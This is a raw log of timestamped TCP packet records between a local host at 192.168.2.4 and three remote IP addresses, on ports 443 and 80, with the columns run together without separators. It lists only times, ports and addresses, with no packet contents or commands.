                                                                                                                                                                                  Dec 16, 2024 18:28:50.025893927 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.030778885 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.030855894 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.030904055 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.031013012 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.035733938 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.035801888 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.035819054 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.035891056 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.040647030 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.040714979 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.040760040 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.040828943 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.045347929 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.045450926 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.045521975 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.045584917 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.050415993 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.050489902 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.050507069 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.050576925 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.054817915 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.054892063 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.054936886 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.055003881 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.060848951 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.060939074 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.061115026 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.061182976 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.064289093 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.064361095 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.064522982 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.064587116 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.071346998 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.071438074 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.071631908 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.071696043 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.073765993 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.073833942 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.073853970 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.073915005 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.080665112 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.080768108 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.080805063 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.080885887 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.083311081 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.083429098 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.083578110 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.083637953 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.090799093 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.090888977 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.090943098 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.091005087 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.091890097 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.091967106 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.092027903 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.092082977 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.099280119 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.099380970 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.099409103 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.099479914 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.100523949 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.100610018 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.100677013 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.100749016 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.100764036 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.100836039 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.107460976 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.107569933 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.107599020 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.107647896 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.109128952 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.109193087 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.109215021 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.109267950 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.115792036 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.115880013 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.115931988 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.115993023 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.117471933 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.117605925 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.117624998 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.117686033 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.123950005 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.124007940 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.124109030 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.124166012 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.125777960 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.125830889 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.125910044 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.125956059 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.130378962 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.130466938 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.130486965 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.130599022 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.133626938 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.133706093 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.134038925 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.134111881 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.137676001 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.137732983 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.137878895 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.137932062 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.141345024 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.141427040 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.141464949 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.141519070 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.145679951 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.145772934 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.145849943 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.145931005 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.149233103 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.149296999 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.149584055 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.149636030 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.152820110 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.152896881 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.153002024 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.153060913 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.156208992 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.156261921 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.156411886 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.156465054 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.160003901 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.160084963 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.160267115 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.160321951 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.163564920 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.163707018 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.163779974 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.163836956 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.166680098 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.166744947 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.167052984 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.167112112 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.170002937 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.170068979 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.170156956 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.170303106 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.173156977 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.173222065 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.173275948 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.173335075 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.177139044 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.177261114 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.177275896 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.177331924 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.179487944 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.179559946 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.179660082 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.179721117 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.182508945 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.182586908 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.182600975 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.182652950 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.185471058 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.185544014 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.185612917 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.185674906 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.189692974 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.189788103 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.189800024 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.189862013 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.190324068 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.190388918 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.191545963 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.191723108 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.192075014 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.192141056 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.195195913 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.195261955 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.195609093 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.195674896 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.197700977 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.197760105 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.198141098 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.198200941 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.202861071 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.202927113 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.203190088 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.203248024 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.207868099 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.207932949 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.208374977 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.208437920 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.208451986 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.208517075 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.209553003 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.209614992 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.219345093 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.219407082 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.219419003 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.219480991 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.219546080 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.219604015 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.219665051 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.219670057 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.219743013 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.599853992 CET4973880192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:28:50.720109940 CET8049738158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.720330954 CET4973880192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:28:50.720628977 CET4973880192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:28:50.840420008 CET8049738158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:51.925323009 CET8049738158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:51.928620100 CET4973880192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:28:52.048567057 CET8049738158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:52.303622007 CET8049738158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:52.347534895 CET4973880192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:28:53.165775061 CET49739443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:28:53.165838957 CET44349739104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:53.165929079 CET49739443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:28:53.168272018 CET49739443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:28:53.168298006 CET44349739104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:54.402704000 CET44349739104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:54.403069019 CET49739443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:28:54.407959938 CET49739443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:28:54.407979965 CET44349739104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:54.408447981 CET44349739104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:54.413764954 CET49739443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:28:54.459342957 CET44349739104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:54.849054098 CET44349739104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:54.849205017 CET44349739104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:54.849272966 CET49739443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:28:54.855114937 CET49739443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:28:54.864197969 CET4973880192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:28:54.984307051 CET8049738158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:55.238343954 CET8049738158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:55.241776943 CET49740443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:28:55.241872072 CET44349740104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:55.241969109 CET49740443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:28:55.242360115 CET49740443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:28:55.242403030 CET44349740104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:55.285176039 CET4973880192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:28:56.469893932 CET44349740104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:56.471791983 CET49740443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:28:56.471865892 CET44349740104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:56.968864918 CET44349740104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:56.969032049 CET44349740104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:56.969125032 CET49740443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:28:56.969435930 CET49740443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:28:56.972270966 CET4973880192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:28:56.973438025 CET4974280192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:28:57.092730045 CET8049738158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:57.093020916 CET4973880192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:28:57.093424082 CET8049742158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:57.093600035 CET4974280192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:28:57.093662024 CET4974280192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:28:57.213758945 CET8049742158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:58.322419882 CET8049742158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:58.324235916 CET49744443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:28:58.324338913 CET44349744104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:58.324477911 CET49744443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:28:58.324902058 CET49744443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:28:58.324933052 CET44349744104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:58.363209963 CET4974280192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:28:59.596664906 CET44349744104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:59.598958969 CET49744443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:28:59.599042892 CET44349744104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:00.049329996 CET44349744104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:00.049408913 CET44349744104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:00.049604893 CET49744443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:00.050142050 CET49744443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:00.056137085 CET4975080192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:00.176249981 CET8049750158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:00.176476002 CET4975080192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:00.176654100 CET4975080192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:00.296853065 CET8049750158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:02.105992079 CET8049750158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:02.107377052 CET49756443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:02.107419014 CET44349756104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:02.107511997 CET49756443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:02.107760906 CET49756443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:02.107774019 CET44349756104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:02.160053968 CET4975080192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:03.335783958 CET44349756104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:03.338340998 CET49756443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:03.338428974 CET44349756104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:03.812136889 CET44349756104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:03.812220097 CET44349756104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:03.812339067 CET49756443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:03.812762976 CET49756443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:03.815728903 CET4975080192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:03.816705942 CET4976180192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:03.936707020 CET8049750158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:03.936798096 CET8049761158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:03.937122107 CET4975080192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:03.937235117 CET4976180192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:03.937235117 CET4976180192.168.2.4158.101.44.242
